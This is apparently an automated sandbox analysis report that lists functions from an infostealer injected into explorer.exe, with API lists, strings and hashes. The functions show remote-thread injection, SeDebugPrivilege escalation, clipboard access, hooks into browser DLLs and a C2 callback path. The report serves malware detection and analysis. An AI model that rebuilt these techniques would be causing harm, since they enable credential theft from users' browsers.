                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7819932305B808AEB60CFA6F8547AEB7A5F788B98F404915DE8D97B58DF78C455CB00
                                                                                                                                                                                                                          Function 0E8B3100 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 93injectionlibrarymemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Handle$Close$Process$AddressAllocCreateMemoryModuleOpenProcRemoteThreadVirtualWrite
                                                                                                                                                                                                                          • String ID: @$B8IH$LoadLibraryA$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 752146563-1695730724
                                                                                                                                                                                                                          • Opcode ID: aceee3e72daa409afe0c74074086a186fcbb32be1051051977a91a2bbe77d00d
                                                                                                                                                                                                                          • Instruction ID: aa590dbc6d9792044f0ececc59bd299c19629e6f967f85bc990e55fcaa50994a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aceee3e72daa409afe0c74074086a186fcbb32be1051051977a91a2bbe77d00d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE31A021305B9086EB14DF56F82436A63A5FB89FC1F448825DE4E97B64DF7CC906CB00
                                                                                                                                                                                                                          Function 08B70BF0 Relevance: 22.8, APIs: 5, Strings: 10, Instructions: 267COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • malloc.LIBCMT ref: 08B70C78
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _FF_MSGBANNER.LIBCMT ref: 08B8CB3C
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _NMSG_WRITE.LIBCMT ref: 08B8CB46
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _callnewh.LIBCMT ref: 08B8CB7A
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _errno.LIBCMT ref: 08B8CB85
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _errno.LIBCMT ref: 08B8CB90
                                                                                                                                                                                                                          • free.LIBCMT ref: 08B71020
                                                                                                                                                                                                                          • free.LIBCMT ref: 08B71028
                                                                                                                                                                                                                            • Part of subcall function 08B8CACC: _errno.LIBCMT ref: 08B8CAEC
                                                                                                                                                                                                                          • free.LIBCMT ref: 08B71030
                                                                                                                                                                                                                          • free.LIBCMT ref: 08B71039
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                          • String ID: GetFileVersionInfoSizeA$Process32Next$StrChrA$VerQueryValueA$_errno$eCriticalSection$ersionInfoA$isdigit$isxdigit$olhelp32Snapshot
                                                                                                                                                                                                                          • API String ID: 2761444284-1026861232
                                                                                                                                                                                                                          • Opcode ID: 36c077ed5355f3fc8295b3ec08d29b47507b78eb77a2b19de5eeb13cea3bbcee
                                                                                                                                                                                                                          • Instruction ID: c9eb7026caca7153228061426d9732bc9bf947661dbc11b2424e0aa288d290c4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36c077ed5355f3fc8295b3ec08d29b47507b78eb77a2b19de5eeb13cea3bbcee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5C18136204B46C6EB20DF26E8547A977A1F788B99F404126DECE97B28DF3CD159CB00
                                                                                                                                                                                                                          Function 0E8B3270 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 0E8B32C6
                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32 ref: 0E8B32D9
                                                                                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32 ref: 0E8B32FD
                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 0E8B3320
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8B332B
                                                                                                                                                                                                                          • OpenProcess.KERNEL32 ref: 0E8B333B
                                                                                                                                                                                                                            • Part of subcall function 0E8B3070: OpenProcess.KERNEL32 ref: 0E8B3099
                                                                                                                                                                                                                            • Part of subcall function 0E8B3070: CloseHandle.KERNEL32 ref: 0E8B30C1
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8B3378
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CloseHandleOpen$Token$AdjustCurrentLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                          • String ID: B8IH$SeDebugPrivilege
                                                                                                                                                                                                                          • API String ID: 2357999848-533093496
                                                                                                                                                                                                                          • Opcode ID: 66fffd2de0935a74dfcb0fab2122081d9215bb3b55ed28a7a9a6bcfc679ed4e5
                                                                                                                                                                                                                          • Instruction ID: 7dfce95ff5e919ea20190f077d1b7bdde2bb6613e4f802eaa66aed14e07bb796
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66fffd2de0935a74dfcb0fab2122081d9215bb3b55ed28a7a9a6bcfc679ed4e5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D231E83131578182EB10CF66F85476A77A2FBC9B94F409824ED4EA7B64EF7CC9058700
                                                                                                                                                                                                                          Function 0E8C7CE0 Relevance: 10.5, APIs: 7, Instructions: 37clipboardmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1677084743-0
                                                                                                                                                                                                                          • Opcode ID: bf640c0bf7507bf40261c2d8693ea0401631c1f941285e11bd04364b3ff0d746
                                                                                                                                                                                                                          • Instruction ID: 40b37a1b810ad393e767f0efbd87405d4c4de173e710ab054ab513b7bc1738f3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf640c0bf7507bf40261c2d8693ea0401631c1f941285e11bd04364b3ff0d746
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E012C21216B81C6EB04AB62F81835973A1E789FC0F448935DA4A57765CF7DC8458740
                                                                                                                                                                                                                          Function 0E8B4200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77injectionmemorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 1113946311-2766056989
                                                                                                                                                                                                                          • Opcode ID: bb99e5549d4c44404210e3d2a102585b48636c082e0f941570c191f9acfe0ba0
                                                                                                                                                                                                                          • Instruction ID: 6d350b418f31031d2d276b626d72a3bc850e2dba296cab52d49cc1f0be4ef517
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb99e5549d4c44404210e3d2a102585b48636c082e0f941570c191f9acfe0ba0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6218D32305B8086DB25CF57B961B6AB6B5F788BC0F448529EE9D93B18EF3CC4058B00
                                                                                                                                                                                                                          Function 0E8C7AF0 Relevance: 7.5, APIs: 5, Instructions: 42clipboardCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1006321803-0
                                                                                                                                                                                                                          • Opcode ID: ee642c975acfce22a74874630e39c61d92233d1f2da0fd13e9adb5dd35efcfc7
                                                                                                                                                                                                                          • Instruction ID: 784ba2dc314213df2930c7cbb321831039ca14676d477a8da483eb2a62fb2c26
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee642c975acfce22a74874630e39c61d92233d1f2da0fd13e9adb5dd35efcfc7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D01A721715B8182DE099F26F9583295351EB44FC0F489939DE1F477A8DF3CC895C700
                                                                                                                                                                                                                          Function 0E8E0378 Relevance: .0, Instructions: 1COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                          • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                          Function 0E8CA420 Relevance: 59.9, APIs: 33, Strings: 1, Instructions: 363stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 812771569-109466966
                                                                                                                                                                                                                          • Opcode ID: 63243f6790e5d17214911157205b1940921de3069c4743449ec7b7d160343d5d
                                                                                                                                                                                                                          • Instruction ID: 9c9b5649d7a5904b68074b72569b5b9144334bc77226fe1cb202cbb5d3a3bd68
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63243f6790e5d17214911157205b1940921de3069c4743449ec7b7d160343d5d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE1A1316027488BDB24DF66E89432AB3A1F745B84F408869CB8F97B55DF3DE845CB40
                                                                                                                                                                                                                          Function 0E8CA240 Relevance: 27.2, APIs: 18, Instructions: 171stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4124047334-0
                                                                                                                                                                                                                          • Opcode ID: 896a6772e18e2a38bb0a991d206c4a7a753a7270d8fb3338d4fd2d51914a43c6
                                                                                                                                                                                                                          • Instruction ID: b7f76a6c616de53d7e4180c9f3d526a5a66ae0d4f0211a003c91de1c805ab0b3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 896a6772e18e2a38bb0a991d206c4a7a753a7270d8fb3338d4fd2d51914a43c6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C714A24602B84CAEF089F66EC5432A67A1BB86FC5F448979CD0E97765DF3CD885C780
                                                                                                                                                                                                                          Function 0E8C5A70 Relevance: 22.6, APIs: 14, Strings: 1, Instructions: 137stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 1433255627-109466966
                                                                                                                                                                                                                          • Opcode ID: 85e76e6a571f6c8e61190c0687f8b1d9bdaca75097ac935c84f9baef343490e8
                                                                                                                                                                                                                          • Instruction ID: b24e78a78d5debfacbb9eae4eaff3b84ec4cfe45850cff7d1a6673125f93c8db
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85e76e6a571f6c8e61190c0687f8b1d9bdaca75097ac935c84f9baef343490e8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78519E76705B8086EB24CF16E85435AB7A1FB89FC4F049429CE4E93B59DF3DD9048B00
                                                                                                                                                                                                                          Function 0E8B9450 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 107stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 0E8B9498
                                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL ref: 0E8B94A5
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32 ref: 0E8B94DA
                                                                                                                                                                                                                            • Part of subcall function 0E8BEF20: GetWindowsDirectoryA.KERNEL32 ref: 0E8BEF6C
                                                                                                                                                                                                                            • Part of subcall function 0E8BEF20: GetVolumeInformationA.KERNEL32 ref: 0E8BEFB6
                                                                                                                                                                                                                            • Part of subcall function 0E8BEF20: wsprintfA.USER32 ref: 0E8BF017
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32 ref: 0E8B94FD
                                                                                                                                                                                                                          • lstrcatA.KERNEL32 ref: 0E8B950D
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32 ref: 0E8B95A4
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: send.WS2_32 ref: 0E8B74EC
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: recv.WS2_32 ref: 0E8B7553
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcmpiA.KERNEL32 ref: 0E8B75B3
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrlenA.KERNEL32 ref: 0E8B75D7
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: StrStrA.SHLWAPI ref: 0E8B75EF
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcmpiA.KERNEL32 ref: 0E8B760E
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: strtol.MSVCRT ref: 0E8B7626
                                                                                                                                                                                                                          • lstrcatA.KERNEL32 ref: 0E8B951D
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcpyA.KERNEL32 ref: 0E8B731E
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B732F
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7343
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7357
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7368
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B737C
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B739A
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: wsprintfA.USER32 ref: 0E8B73B2
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B73C6
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B73DA
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7416
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: WSAStartup.WS2_32 ref: 0E8B7426
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: socket.WS2_32 ref: 0E8B7442
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: gethostbyname.WS2_32 ref: 0E8B7459
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: memcpy.MSVCRT ref: 0E8B7479
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: htons.WS2_32 ref: 0E8B7488
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: connect.WS2_32 ref: 0E8B749F
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrlenA.KERNEL32 ref: 0E8B74B5
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: send.WS2_32 ref: 0E8B74CB
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0E8B95BC
                                                                                                                                                                                                                          • lstrlenA.KERNEL32 ref: 0E8B95CA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$CriticalSectionlstrcpylstrlen$lstrcmpimemcpysendwsprintf$DirectoryEnterInformationInitializeLeaveStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                          • String ID: /VzCAHn.php?616766F8886C145454191$616766F8886C145454191$B8IH
                                                                                                                                                                                                                          • API String ID: 3667244998-664803577
                                                                                                                                                                                                                          • Opcode ID: e8196019e5aa11d87cfdbe6b91fda0ce18f79f5cd424b38d00914106e7803aab
                                                                                                                                                                                                                          • Instruction ID: 19cfa0c45d2ac5994b78dfbb32c8eefa11bdff77bcec785cfa03424a916991e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8196019e5aa11d87cfdbe6b91fda0ce18f79f5cd424b38d00914106e7803aab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB514835206BC1C6EB10DB25F85839A73A4FB89B84F408926DA8E93B75DF3DC549CB40
                                                                                                                                                                                                                          Function 0E8C98C0 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 150COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8CA1C0: RtlInitializeCriticalSection.NTDLL ref: 0E8CA1F1
                                                                                                                                                                                                                            • Part of subcall function 0E8CA1C0: RtlInitializeCriticalSection.NTDLL ref: 0E8CA1FE
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32 ref: 0E8C9960
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32 ref: 0E8C997A
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 0E8C999F
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8C99FA
                                                                                                                                                                                                                          • free.MSVCRT ref: 0E8C9A03
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                                                                          • String ID: .text$B8IH$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                                                                          • API String ID: 308684148-1405465699
                                                                                                                                                                                                                          • Opcode ID: 52db66b71d942326f6a3057831e2c129c17e66db914c7c367b284b4bf96511bd
                                                                                                                                                                                                                          • Instruction ID: f2f685ee6ecc9d0bc3292f5f004a1cc614821cbde71b957356e7ee291273f961
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52db66b71d942326f6a3057831e2c129c17e66db914c7c367b284b4bf96511bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B519031315B85D6EB24EF11E8503A963A4F7CAB84F88886ADE4D97764EF3CC909C741
                                                                                                                                                                                                                          Function 0E8D0E20 Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4099253644-0
                                                                                                                                                                                                                          • Opcode ID: f28695c1721cc922f6cd581513c1ebbdbf0f108c64f7b85277b68bf9fb14047b
                                                                                                                                                                                                                          • Instruction ID: 076a35dcb58385148b3e699028b40ecd70af7b29abad7c9bf9aa235a7f5d7073
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f28695c1721cc922f6cd581513c1ebbdbf0f108c64f7b85277b68bf9fb14047b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF315E61605B8582EE18AB9DEC6477523A1ABC9B94F0D9E35C91D9B2F0CF3CC849C341
                                                                                                                                                                                                                          Function 08B92360 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$_malloc_crtmalloc
                                                                                                                                                                                                                          • String ID: ESA$ESE
                                                                                                                                                                                                                          • API String ID: 2027218043-2868331210
                                                                                                                                                                                                                          • Opcode ID: bbe10e8078358fe23508d738b7d6484acbae767f3e45565ef4f7afcba5aa96c2
                                                                                                                                                                                                                          • Instruction ID: c08fab7bd15b6ab8a0fdcd3a8646c996dda7a0d548783579c2d0006f12aa37b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbe10e8078358fe23508d738b7d6484acbae767f3e45565ef4f7afcba5aa96c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20519D26701B01A3EF24EF16E99071A7364F788B99F4845799FAD07B24EF38D166C740
                                                                                                                                                                                                                          Function 0E8D2F60 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _malloc_crt.LIBCMT ref: 0E8D2F89
                                                                                                                                                                                                                            • Part of subcall function 0E8D01E8: malloc.LIBCMT ref: 0E8D0213
                                                                                                                                                                                                                            • Part of subcall function 0E8D01E8: Sleep.KERNEL32 ref: 0E8D0226
                                                                                                                                                                                                                          • free.LIBCMT ref: 0E8D308A
                                                                                                                                                                                                                          • free.LIBCMT ref: 0E8D30A6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 2523592665-109466966
                                                                                                                                                                                                                          • Opcode ID: 6ddb8c0c28131733b13b743a7376c5917c7c593878d1fa8564931c1e7f0c3d7d
                                                                                                                                                                                                                          • Instruction ID: 6a2d4659b4527bb94782e4b80200c20ef6465794dadcb8be5d73101ba9a15e33
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ddb8c0c28131733b13b743a7376c5917c7c593878d1fa8564931c1e7f0c3d7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1051C532305B4593DB21EF1AE95071A73A4F788B98F444929DF5D87B60DF38C86AC741
                                                                                                                                                                                                                          Function 0E8B4840 Relevance: 13.6, APIs: 9, Instructions: 120stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8B4A00: isdigit.MSVCRT ref: 0E8B4A27
                                                                                                                                                                                                                          • tolower.MSVCRT ref: 0E8B48B8
                                                                                                                                                                                                                            • Part of subcall function 0E8B46A0: malloc.MSVCRT ref: 0E8B46B0
                                                                                                                                                                                                                            • Part of subcall function 0E8B46A0: free.MSVCRT ref: 0E8B46D0
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0E8B4939
                                                                                                                                                                                                                          • _errno.MSVCRT ref: 0E8B493F
                                                                                                                                                                                                                          • strtod.MSVCRT ref: 0E8B495D
                                                                                                                                                                                                                          • _errno.MSVCRT ref: 0E8B49BA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
